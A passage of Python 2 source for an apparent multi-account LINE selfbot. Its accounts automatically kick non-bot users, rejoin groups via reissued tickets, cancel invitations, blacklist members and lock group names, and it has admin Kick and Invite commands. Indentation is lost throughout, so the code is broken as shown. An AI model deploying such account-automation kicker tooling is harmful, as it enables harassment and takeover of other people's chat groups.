X.preventJoinByTicket = False
kd.updateGroup(X)
Ticket = kd.reissueGroupTicket(op.param1)
kc.acceptGroupInvitationByTicket(op.param1,Ticket)
X.preventJoinByTicket = True
kd.updateGroup(X)
wait["blacklist"][op.param2] = False
if op.type == 13:
if op.param3 in Emid:
if op.param2 in Fmid:
X = kd.getGroup(op.param1)
X.preventJoinByTicket = False
kf.updateGroup(X)
Ti = kf.reissueGroupTicket(op.param1)
kc.acceptGroupInvitationByTicket(op.param1,Ti)
X.preventJoinByTicket = True
kf.updateGroup(X)
else:
X = kf.getGroup(op.param1)
kf.kickoutFromGroup(op.param1,[op.param2])
X.preventJoinByTicket = False
kf.updateGroup(X)
Ticket = kf.reissueGroupTicket(op.param1)
kc.acceptGroupInvitationByTicket(op.param1,Ticket)
X.preventJoinByTicket = True
kf.updateGroup(X)
wait["blacklist"][op.param2] = False
if op.type == 13:
if op.param3 in Fmid:
if op.param2 in Dmid:
X = kc.getGroup(op.param1)
X.preventJoinByTicket = False
kb.updateGroup(X)
Ti = kb.reissueGroupTicket(op.param1)
ke.acceptGroupInvitationByTicket(op.param1,Ti)
X.preventJoinByTicket = True
kb.updateGroup(X)
else:
X = kb.getGroup(op.param1)
kb.kickoutFromGroup(op.param1,[op.param2])
X.preventJoinByTicket = False
kb.updateGroup(X)
Ticket = kb.reissueGroupTicket(op.param1)
ke.acceptGroupInvitationByTicket(op.param1,Ticket)
X.preventJoinByTicket = True
kb.updateGroup(X)
wait["blacklist"][op.param2] = False
if op.type == 13:
if op.param3 in Gmid:
if op.param2 in Amid:
G = cl.getGroup(op.param1)
G.preventJoinByTicket = False
kg.updateGroup(G)
Ticket = ki.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki.updateGroup(G)
else:
G = ki.getGroup(op.param1)
ki.kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = False
ki.updateGroup(G)
Ticket = ki.reissueGroupTicket(op.param1)
kg.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki.updateGroup(G)
wait["blacklist"][op.param2] = False
if op.type == 13:
if op.param3 in Hmid:
if op.param2 in Emid:
X = kb.getGroup(op.param1)
X.preventJoinByTicket = False
kd.updateGroup(X)
Ti = kd.reissueGroupTicket(op.param1)
kh.acceptGroupInvitationByTicket(op.param1,Ti)
X.preventJoinByTicket = True
kd.updateGroup(X)
else:
X = kd.getGroup(op.param1)
kd.kickoutFromGroup(op.param1,[op.param2])
X.preventJoinByTicket = False
kd.updateGroup(X)
Ticket = kd.reissueGroupTicket(op.param1)
kh.acceptGroupInvitationByTicket(op.param1,Ticket)
X.preventJoinByTicket = True
kd.updateGroup(X)
wait["blacklist"][op.param2] = False
if op.type == 13:
if op.param3 in Jmid:
if op.param2 in Emid:
X = kb.getGroup(op.param1)
X.preventJoinByTicket = False
kd.updateGroup(X)
Ti = kd.reissueGroupTicket(op.param1)
kj.acceptGroupInvitationByTicket(op.param1,Ti)
X.preventJoinByTicket = True
kd.updateGroup(X)
else:
X = kd.getGroup(op.param1)
kd.kickoutFromGroup(op.param1,[op.param2])
X.preventJoinByTicket = False
kd.updateGroup(X)
Ticket = kd.reissueGroupTicket(op.param1)
kj.acceptGroupInvitationByTicket(op.param1,Ticket)
X.preventJoinByTicket = True
kd.updateGroup(X)
wait["blacklist"][op.param2] = False
if op.type == 32:
if not op.param2 in Bots:
if wait["protectionOn"] == True:
try:
klist=[cl,ki,kk,kc,kb,kd,ke,kf,kg,kh,kj]
fuck=random.choice(klist)
G = fuck.getGroup(op.param1)
fuck.kickoutFromGroup(op.param1,[op.param2])
cl.inviteIntoGroup(op.param1, [op.param3])
except Exception, e:
print e
if op.type == 13:
if mid in op.param3:
G = cl.getGroup(op.param1)
if wait["autoJoin"] == True:
if wait["autoCancel"]["on"] == True:
if len(G.members) <= wait["autoCancel"]["members"]:
cl.rejectGroupInvitation(op.param1)
else:
cl.acceptGroupInvitation(op.param1)
else:
cl.acceptGroupInvitation(op.param1)
elif wait["autoCancel"]["on"] == True:
if len(G.members) <= wait["autoCancel"]["members"]:
cl.rejectGroupInvitation(op.param1)
else:
Inviter = op.param3.replace("",',')
InviterX = Inviter.split(",")
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, InviterX)
if matched_list == []:
pass
else:
cl.cancelGroupInvitation(op.param1, matched_list)
if op.type == 11:
if not op.param2 in Bots:
if wait["qr"] == True:
try:
kpist=[cl,ki,kk,kc,kb,kd,ke,kf,kg,kh,kj]
puck=random.choice(kpist)
G = puck.getGroup(op.param1)
G.preventJoinByTicket = True
puck.updateGroup(G)
except Exception, e:
print e
if op.type == 11:
if not op.param3 == '1':
if op.param1 in wait['pname']:
try:
G = cl.getGroup(op.param1)
except:
try:
G = ki.getGroup(op.param1)
except:
try:
G = kk.getGroup(op.param1)
except:
try:
G = kc.getGroup(op.param1)
except:
try:
G = kb.getGroup(op.param1)
except:
try:
G = kd.getGroup(op.param1)
except:
pass
G.name = wait['pro_name'][op.param1]
try:
cl.updateGroup(G)
except:
try:
ki.updateGroup(G)
except:
try:
kk.updateGroup(G)
except:
try:
kc.updateGroup(G)
except:
try:
kb.updateGroup(G)
except:
try:
kd.updateGroup(G)
except:
pass
if op.param2 in Bots:
pass
else:
try:
ki.kickoutFromGroup(op.param1,[op.param2])
except:
try:
kk.kickoutFromGroup(op.param1,[op.param2])
except:
try:
kc.kickoutFromGroup(op.param1,[op.param2])
except:
try:
kb.kickoutFromGroup(op.param1,[op.param2])
except:
try:
kd.kickoutFromGroup(op.param1,[op.param2])
except:
pass
cl.sendText(op.param1,"Group name lock")
ki.sendText(op.param1,"Haddeuh dikunci Pe'a")
kk.sendText(op.param1,"Wekawekaweka Har Har")
c = Message(to=op.param1, from_=None, text=None, contentType=13)
c.contentMetadata={'mid':op.param2}
cl.sendMessage(c)
#------------------------[Welcome]----------------------------
if op.type == 17:
if wait["welcome"] == True:
if op.param2 in admin:
return
ginfo = cl.getGroup(op.param1)
cl.sendText(op.param1, "Selamat Datang Di Grup " + str(ginfo.name))
cl.sendText(op.param1, "Owner Grup " + str(ginfo.name) + " :\n" + ginfo.creator.displayName)
print "MEMBER HAS LEFT THE GROUP"
if op.type == 15:
if op.param2 in admin:
return
cl.sendText(op.param1, "Good Bye kaka akoohhh 😎😎")
print "MEMBER HAS LEFT THE GROUP"
#--------------------------------------------------------------------
if op.type == 11:
if not op.param2 in Bots:
if wait["protectionOn"] == True:
try:
kpist=[cl,ki,kk,kc,kb,kd,ke,kf,kg,kh,kj]
puck=random.choice(kpist)
G = puck.getGroup(op.param1)
G.preventJoinByTicket = True
puck.updateGroup(G)
puck.kickoutFromGroup(op.param1,[op.param2])
G = puck.getGroup(op.param1)
G.preventJoinByTicket = True
puck.updateGroup(G)
except Exception, e:
print e
if op.type == 13:
U = cl.getGroup(op.param1)
I = U.creator
if not op.param2 in Bots:
if wait["protectionOn"] == True:
klist=[cl,ki,kk,kc,kb,kd,ke,kf,kg,kh,kj]
puck=random.choice(klist)
G = puck.getGroup(op.param1)
if G is not None:
gInviMids = [contact.mid for contact in G.invitee]
puck.cancelGroupInvitation(op.param1, gInviMids)
if op.type == 19:
if not op.param2 in Bots:
try:
gs = cl.getGroup(op.param1)
gs = ki.getGroup(op.param1)
gs = kk.getGroup(op.param1)
gs = kc.getGroup(op.param1)
targets = [op.param2]
for target in targets:
try:
wait["blacklist"][target] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
except:
pass
except Exception, e:
print e
if not op.param2 in Bots:
if wait["Backup"] == True:
try:
cl.inviteIntoGroup(op.param1, [op.param3])
except Exception, e:
print e
if not op.param2 in Bots:
if wait["protectionOn"] == True:
try:
klist=[cl,ki,kk,kc,kb,kd,ke,kf,kg,kh,kj]
kicker=random.choice(klist)
G = kicker.getGroup(op.param1)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(op.param1)
kicker.acceptGroupInvitationByTicket(op.param1,Ticket)
time.sleep(0.2)
G = cl.getGroup(op.param1)
G.preventJoinByTicket = True
kicker.kickoutFromGroup(op.param1,[op.param2])
kicker.leaveGroup(op.param1)
cl.updateGroup(G)
except Exception, e:
print e
if mid in op.param3:
if op.param2 in Bots:
pass
try:
cl.kickoutFromGroup(op.param1,[op.param2])
kk.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client Kick regulation or Because it does not exist in the group、\n["+op.param1+"]\nの\n["+op.param2+"]\nI could not kick.\nAdd it to the black list.")
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
G = ki.getGroup(op.param1)
G.preventJoinByTicket = False
ki.updateGroup(G)
Ti = ki.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
kk.acceptGroupInvitationByTicket(op.param1,Ti)
X = cl.getGroup(op.param1)
X.preventJoinByTicket = True
cl.updateGroup(X)
Ti = cl.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
if Amid in op.param3:
if op.param2 in Bots:
pass
try:
ki.kickoutFromGroup(op.param1,[op.param2])
cl.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client Because there is no kick regulation or group,\n["+op.param1+"]\nof\n["+op.param2+"]\nI could not kick.\nAdd it to the black list.")
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
X = kk.getGroup(op.param1)
X.preventJoinByTicket = False
kk.updateGroup(X)
Ti = kk.reissueGroupTicket(op.param1)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
G = ki.getGroup(op.param1)
G.preventJoinByTicket = True
ki.updateGroup(G)
Ticket = ki.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
if Bmid in op.param3:
if op.param2 in Bots:
pass
try:
kk.kickoutFromGroup(op.param1,[op.param2])
ki.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client Because there is no kick regulation or group,\n["+op.param1+"]\nof\n["+op.param2+"]\nI could not kick.\nAdd it to the black list.")
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
X = cl.getGroup(op.param1)
X.preventJoinByTicket = False
cl.updateGroup(X)
Ti = cl.reissueGroupTicket(op.param1)
kk.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
G = kk.getGroup(op.param1)
G.preventJoinByTicket = True
kk.updateGroup(G)
Ticket = kk.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
if Cmid in op.param3:
if op.param2 in Bots:
pass
try:
kc.kickoutFromGroup(op.param1,[op.param2])
kk.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client Because there is no kick regulation or group,\n["+op.param1+"]\nof\n["+op.param2+"]\nI could not kick.\nAdd it to the black list.")
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
X = ki.getGroup(op.param1)
X.preventJoinByTicket = False
ki.updateGroup(X)
Ti = ki.reissueGroupTicket(op.param1)
kc.acceptGroupInvitationByTicket(op.param1,Ti)
kk.acceptGroupInvitationByTicket(op.param1,Ti)
G = kk.getGroup(op.param1)
G.preventJoinByTicket = True
kk.updateGroup(G)
Ticket = kc.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
if Dmid in op.param3:
if op.param2 in Bots:
pass
try:
kb.kickoutFromGroup(op.param1,[op.param2])
kd.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client Because there is no kick regulation or group,\n["+op.param1+"]\nof\n["+op.param2+"]\nI could not kick.\nAdd it to the black list.")
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
X = kk.getGroup(op.param1)
X.preventJoinByTicket = False
kk.updateGroup(X)
Ti = kk.reissueGroupTicket(op.param1)
kb.acceptGroupInvitationByTicket(op.param1,Ti)
kd.acceptGroupInvitationByTicket(op.param1,Ti)
G = kk.getGroup(op.param1)
G.preventJoinByTicket = True
kk.updateGroup(G)
Ticket = kk.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
if Emid in op.param3:
if op.param2 in Bots:
pass
try:
kd.kickoutFromGroup(op.param1,[op.param2])
cl.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client Because there is no kick regulation or group,\n["+op.param1+"]\nof\n["+op.param2+"]\nI could not kick.\nAdd it to the black list.")
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
X = ki.getGroup(op.param1)
X.preventJoinByTicket = False
ki.updateGroup(X)
Ti = ki.reissueGroupTicket(op.param1)
kd.acceptGroupInvitationByTicket(op.param1,Ti)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
G = ki.getGroup(op.param1)
G.preventJoinByTicket = True
ki.updateGroup(G)
Ticket = ki.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
if Fmid in op.param3:
if op.param2 in Bots:
pass
try:
ke.kickoutFromGroup(op.param1,[op.param2])
kk.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client Because there is no kick regulation or group,\n["+op.param1+"]\nof\n["+op.param2+"]\nI could not kick.\nAdd it to the black list.")
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
X = cl.getGroup(op.param1)
X.preventJoinByTicket = False
cl.updateGroup(X)
Ti = cl.reissueGroupTicket(op.param1)
ke.acceptGroupInvitationByTicket(op.param1,Ti)
kk.acceptGroupInvitationByTicket(op.param1,Ti)
G = cl.getGroup(op.param1)
G.preventJoinByTicket = True
cl.updateGroup(G)
Ticket = cl.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
if op.type == 13:
if mid in op.param3:
G = cl.getGroup(op.param1)
if wait["autoJoin"] == True:
if wait["autoCancel"]["on"] == True:
if len(G.members) <= wait["autoCancel"]["members"]:
cl.rejectGroupInvitation(op.param1)
else:
cl.acceptGroupInvitation(op.param1)
else:
cl.acceptGroupInvitation(op.param1)
elif wait["autoCancel"]["on"] == True:
if len(G.members) <= wait["autoCancel"]["members"]:
cl.rejectGroupInvitation(op.param1)
else:
Inviter = op.param3.replace("\x1e",",")  # invited mids arrive \x1e-separated
InviterX = Inviter.split(",")
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, InviterX)
if matched_list == []:
pass
else:
cl.cancelGroupInvitation(op.param1, matched_list)
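# Aside: a minimal, equivalent sketch of the blacklist match above. The
# filter(lambda ...) loop scans the invitee list once per blacklist
# entry; a set intersection does the same job in one pass (assumes
# wait["blacklist"] keys and InviterX entries are both plain mids):
#     matched_list = list(set(wait["blacklist"]) & set(InviterX))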
if op.type == 22:
if wait["leaveRoom"] == True:
cl.leaveRoom(op.param1)
if op.type == 24:
if wait["leaveRoom"] == True:
cl.leaveRoom(op.param1)
if op.type == 26:
msg = op.message
if msg.toType == 0:
msg.to = msg.from_
if msg.from_ in admin:
if "join:" in msg.text:
list_ = msg.text.split(":")
try:
cl.acceptGroupInvitationByTicket(list_[1],list_[2])
X = cl.getGroup(list_[1])
X.preventJoinByTicket = True
cl.updateGroup(X)
except:
cl.sendText(msg.to,"error")
if msg.toType == 1:
if wait["leaveRoom"] == True:
cl.leaveRoom(msg.to)
if msg.contentType == 16:
url = msg.contentMetadata["postEndUrl"]
cl.like(url[25:58], url[66:], likeType=1001)
if op.type == 25:
msg = op.message
if msg.contentType == 13:
if wait["wblack"] == True:
if msg.contentMetadata["mid"] in wait["commentBlack"]:
cl.sendText(msg.to,"already")
wait["wblack"] = False
else:
wait["commentBlack"][msg.contentMetadata["mid"]] = True
wait["wblack"] = False
cl.sendText(msg.to,"decided not to comment")
elif wait["dblack"] == True:
if msg.contentMetadata["mid"] in wait["commentBlack"]:
del wait["commentBlack"][msg.contentMetadata["mid"]]
cl.sendText(msg.to,"deleted")
ki.sendText(msg.to,"deleted")
kk.sendText(msg.to,"deleted")
kc.sendText(msg.to,"deleted")
wait["dblack"] = False
else:
wait["dblack"] = False
cl.sendText(msg.to,"It is not in the black list")
ki.sendText(msg.to,"It is not in the black list")
kk.sendText(msg.to,"It is not in the black list")
kc.sendText(msg.to,"It is not in the black list")
elif wait["wblacklist"] == True:
if msg.contentMetadata["mid"] in wait["blacklist"]:
cl.sendText(msg.to,"already")
ki.sendText(msg.to,"already")
kk.sendText(msg.to,"already")
kc.sendText(msg.to,"already")
wait["wblacklist"] = False
else:
wait["blacklist"][msg.contentMetadata["mid"]] = True
wait["wblacklist"] = False
cl.sendText(msg.to,"Succes")
ki.sendText(msg.to,"Secces")
kk.sendText(msg.to,"Succes")
kc.sendText(msg.to,"Succes")
elif wait["dblacklist"] == True:
if msg.contentMetadata["mid"] in wait["blacklist"]:
del wait["blacklist"][msg.contentMetadata["mid"]]
cl.sendText(msg.to,"deleted")
ki.sendText(msg.to,"deleted")
kk.sendText(msg.to,"deleted")
kc.sendText(msg.to,"deleted")
wait["dblacklist"] = False
else:
wait["dblacklist"] = False
cl.sendText(msg.to,"It is not in the black list")
ki.sendText(msg.to,"It is not in the black list")
kk.sendText(msg.to,"It is not in the black list")
kc.sendText(msg.to,"It is not in the black list")
elif wait["contact"] == True:
msg.contentType = 0
cl.sendText(msg.to,msg.contentMetadata["mid"])
if 'displayName' in msg.contentMetadata:
contact = cl.getContact(msg.contentMetadata["mid"])
try:
cu = cl.channel.getCover(msg.contentMetadata["mid"])
except:
cu = ""
cl.sendText(msg.to,"🔹[NAME]:\n" + msg.contentMetadata["displayName"] + "\n🔹[MID]:\n" + msg.contentMetadata["mid"] + "\n🔹[STATUS]:\n" + contact.statusMessage + "\n🔹[PICTURE STATUS]:\nhttp://dl.profile.line-cdn.net/" + contact.pictureStatus + "\n🔹[CoverURL]:\n" + str(cu))
else:
contact = cl.getContact(msg.contentMetadata["mid"])
try:
cu = cl.channel.getCover(msg.contentMetadata["mid"])
except:
cu = ""
cl.sendText(msg.to,"🔹[NAME]:\n" + msg.contentMetadata["displayName"] + "\n🔹[MID]:\n" + msg.contentMetadata["mid"] + "\n🔹[STATUS]:\n" + contact.statusMessage + "\n🔹[PICTURE STATUS]:\nhttp://dl.profile.line-cdn.net/" + contact.pictureStatus + "\n🔹[CoverURL]:\n" + str(cu))
elif msg.contentType == 16:
if wait["timeline"] == True:
msg.contentType = 0
if wait["lang"] == "JP":
msg.text = "post URL\n" + msg.contentMetadata["postEndUrl"]
else:
msg.text = "URL→\n" + msg.contentMetadata["postEndUrl"]
cl.sendText(msg.to,msg.text)
elif msg.text is None:
return
elif msg.text in ["Myhelp"]:
if wait["lang"] == "JP":
cl.sendText(msg.to,helpMessage)
else:
cl.sendText(msg.to,helpt)
elif ("Gn: " in msg.text):
if msg.toType == 2:
X = cl.getGroup(msg.to)
X.name = msg.text.replace("Gn: ","")
cl.updateGroup(X)
else:
cl.sendText(msg.to,"It can't be used besides the group.")
elif ("R1 gn " in msg.text):
if msg.toType == 2:
X = cl.getGroup(msg.to)
X.name = msg.text.replace("R1 gn ","")
ki.updateGroup(X)
else:
ki.sendText(msg.to,"It can't be used besides the group.")
elif ("R2 gn " in msg.text):
if msg.toType == 2:
X = cl.getGroup(msg.to)
X.name = msg.text.replace("R2 gn ","")
kk.updateGroup(X)
else:
kk.sendText(msg.to,"It can't be used besides the group.")
elif ("R3 gn " in msg.text):
if msg.toType == 2:
X = cl.getGroup(msg.to)
X.name = msg.text.replace("R3 gn ","")
kc.updateGroup(X)
else:
kc.sendText(msg.to,"It can't be used besides the group.")
elif "Kick " in msg.text:
midd = msg.text.replace("Kick ","")
cl.kickoutFromGroup(msg.to,[midd])
elif "R1 kick " in msg.text:
midd = msg.text.replace("R1 kick ","")
ki.kickoutFromGroup(msg.to,[midd])
elif "R2 kick " in msg.text:
midd = msg.text.replace("R2 kick ","")
kk.kickoutFromGroup(msg.to,[midd])
elif "Invite " in msg.text:
midd = msg.text.replace("Invite ","")
cl.findAndAddContactsByMid(midd)
cl.inviteIntoGroup(msg.to,[midd])
elif "R1 invite " in msg.text:
midd = msg.text.replace("R1 invite ","")
ki.findAndAddContactsByMid(midd)
ki.inviteIntoGroup(msg.to,[midd])
elif "R2 invite " in msg.text:
midd = msg.text.replace("R2 invite ","")
kk.findAndAddContactsByMid(midd)
kk.inviteIntoGroup(msg.to,[midd])
elif msg.text in ["Me"]:
msg.contentType = 13
msg.contentMetadata = {'mid': mid}
cl.sendMessage(msg)
elif msg.text in ["1"]:
msg.contentType = 13
msg.contentMetadata = {'mid': Amid}
ki.sendMessage(msg)
elif msg.text in ["2"]:
msg.contentType = 13
msg.contentMetadata = {'mid': Bmid}
kk.sendMessage(msg)
elif msg.text in ["3"]:
msg.contentType = 13
msg.contentMetadata = {'mid': Cmid}
kc.sendMessage(msg)
elif msg.text in ["æ„›ã®ãƒ—レゼント","Gift"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58',
'PRDTYPE': 'THEME',
'MSGTPL': '2'}
msg.text = None
cl.sendMessage(msg)
elif msg.text in ["æ„›ã®ãƒ—レゼント","Gift1"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58',
'PRDTYPE': 'THEME',
'MSGTPL': '8'}
msg.text = None
cl.sendMessage(msg)
elif msg.text in ["æ„›ã®ãƒ—レゼント","Gift2"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58',
'PRDTYPE': 'THEME',
'MSGTPL': '6'}
msg.text = None
cl.sendMessage(msg)
elif msg.text in ["æ„›ã®ãƒ—レゼント","Gift3"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58',
'PRDTYPE': 'THEME',
'MSGTPL': '7'}
msg.text = None
cl.sendMessage(msg)
elif msg.text in ["cancel","Cancel"]:
if msg.toType == 2:
X = cl.getGroup(msg.to)
if X.invitee is not None:
gInviMids = [contact.mid for contact in X.invitee]
cl.cancelGroupInvitation(msg.to, gInviMids)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"No one is inviting")
else:
cl.sendText(msg.to,"Sorry, nobody absent")
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can not be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
elif msg.text in ["All cancel","Bot cancel"]:
if msg.toType == 2:
G = kk.getGroup(msg.to)
if G.invitee is not None:
gInviMids = [contact.mid for contact in G.invitee]
kk.cancelGroupInvitation(msg.to, gInviMids)
else:
if wait["lang"] == "JP":
kk.sendText(msg.to,"No one is inviting")
else:
kk.sendText(msg.to,"Sorry, nobody absent")
else:
if wait["lang"] == "JP":
kk.sendText(msg.to,"Can not be used outside the group")
else:
kk.sendText(msg.to,"Not for use less than group")
elif "gurl" == msg.text:
print cl.getGroup(msg.to)
cl.sendMessage(msg)
elif msg.text in ["Qr on","Link on"]:
if msg.toType == 2:
X = cl.getGroup(msg.to)
X.preventJoinByTicket = False
cl.updateGroup(X)
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done")
else:
cl.sendText(msg.to,"already open")
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can not be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
elif msg.text in ["R1 ourl","R1 link on"]:
if msg.toType == 2:
X = cl.getGroup(msg.to)
X.preventJoinByTicket = False
ki.updateGroup(X)
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done ")
else:
cl.sendText(msg.to,"already open")
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can not be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
elif msg.text in ["R2 ourl","R2 link on"]:
if msg.toType == 2:
X = kk.getGroup(msg.to)
X.preventJoinByTicket = False
kk.updateGroup(X)
if wait["lang"] == "JP":
kk.sendText(msg.to,"Done ")
else:
kk.sendText(msg.to,"already open")
else:
if wait["lang"] == "JP":
kk.sendText(msg.to,"Can not be used outside the group")
else:
kk.sendText(msg.to,"Not for use less than group")
elif msg.text in ["Qr off","Link off"]:
if msg.toType == 2:
X = cl.getGroup(msg.to)
X.preventJoinByTicket = True
cl.updateGroup(X)
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done")
else:
cl.sendText(msg.to,"already close")
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can not be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
elif msg.text in ["R1 curl","R1 link off"]:
if msg.toType == 2:
X = ki.getGroup(msg.to)
X.preventJoinByTicket = True
ki.updateGroup(X)
if wait["lang"] == "JP":
ki.sendText(msg.to,"Done ")
else:
ki.sendText(msg.to,"already close")
else:
if wait["lang"] == "JP":
ki.sendText(msg.to,"Can not be used outside the group")
else:
ki.sendText(msg.to,"Not for use less than group")
elif msg.text in ["R2 curl","R2 link off"]:
if msg.toType == 2:
X = kk.getGroup(msg.to)
X.preventJoinByTicket = True
kk.updateGroup(X)
if wait["lang"] == "JP":
kk.sendText(msg.to,"Done ")
else:
kk.sendText(msg.to,"already close")
else:
if wait["lang"] == "JP":
kk.sendText(msg.to,"Can not be used outside the group")
else:
kk.sendText(msg.to,"Not for use less than group")
elif msg.text == "Ginfo":
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
gCreator = ginfo.creator.displayName
except:
gCreator = "Error"
if wait["lang"] == "JP":
if ginfo.invitee is None:
sinvitee = "0"
else:
sinvitee = str(len(ginfo.invitee))
if ginfo.preventJoinByTicket == True:
u = "close"
else:
u = "open"
cl.sendText(msg.to,"➰ NAME GROUP ➰\n" + str(ginfo.name) + "\n\n🔹 Group Id \n" + msg.to + "\n\n🔹Creator \n" + gCreator + "\n\n🔹Status profile \nhttp://dl.profile.line.naver.jp/" + ginfo.pictureStatus + "\n\n~ Members :: " + str(len(ginfo.members)) + " Members\n~ Pending :: " + sinvitee + " People\n~ URL :: " + u + "it is inside")
else:
cl.sendText(msg.to,"[group name]\n" + str(ginfo.name) + "\n[gid]\n" + msg.to + "\n[group creator]\n" + gCreator + "\n[profile status]\nhttp://dl.profile.line.naver.jp/" + ginfo.pictureStatus)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can not be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
elif "Gc" == msg.text:
try:
group = cl.getGroup(msg.to)
GS = group.creator.mid
M = Message()
M.to = msg.to
M.contentType = 13
M.contentMetadata = {'mid': GS}
cl.sendMessage(M)
except:
W = group.members[0].mid
M = Message()
M.to = msg.to
M.contentType = 13
M.contentMetadata = {'mid': W}
cl.sendMessage(M)
cl.sendText(msg.to,"old user")
elif "Id" == msg.text:
cl.sendText(msg.to,msg.to)
elif "All mid" == msg.text:
cl.sendText(msg.to,mid)
ki.sendText(msg.to,Amid)
kk.sendText(msg.to,Bmid)
kc.sendText(msg.to,Cmid)
kb.sendText(msg.to,Dmid)
kd.sendText(msg.to,Emid)
ke.sendText(msg.to,Fmid)
kf.sendText(msg.to,Imid)
kg.sendText(msg.to,Gmid)
kh.sendText(msg.to,Hmid)
kj.sendText(msg.to,Jmid)
elif "Mid" == msg.text:
cl.sendText(msg.to,mid)
elif "R1 mid" == msg.text:
ki.sendText(msg.to,Amid)
elif "R2 mid" == msg.text:
kk.sendText(msg.to,Bmid)
elif "TL: " in msg.text:
tl_text = msg.text.replace("TL: ","")
cl.sendText(msg.to,"line://home/post?userMid="+mid+"&postId="+cl.new_post(tl_text)["result"]["post"]["postInfo"]["postId"])
elif msg.text in ["Protect:on","Protect on"]:
if wait["protectionOn"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already on")
else:
cl.sendText(msg.to,"Protection Enable On")
else:
wait["protectionOn"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protection Enable On")
else:
cl.sendText(msg.to,"already on")
elif msg.text in ["Protect qr off"]:
if wait["qr"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already off")
else:
cl.sendText(msg.to,"Protection QR Off")
else:
wait["qr"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protection QR Off")
else:
cl.sendText(msg.to,"Already off")
elif msg.text in ["Protect qr on"]:
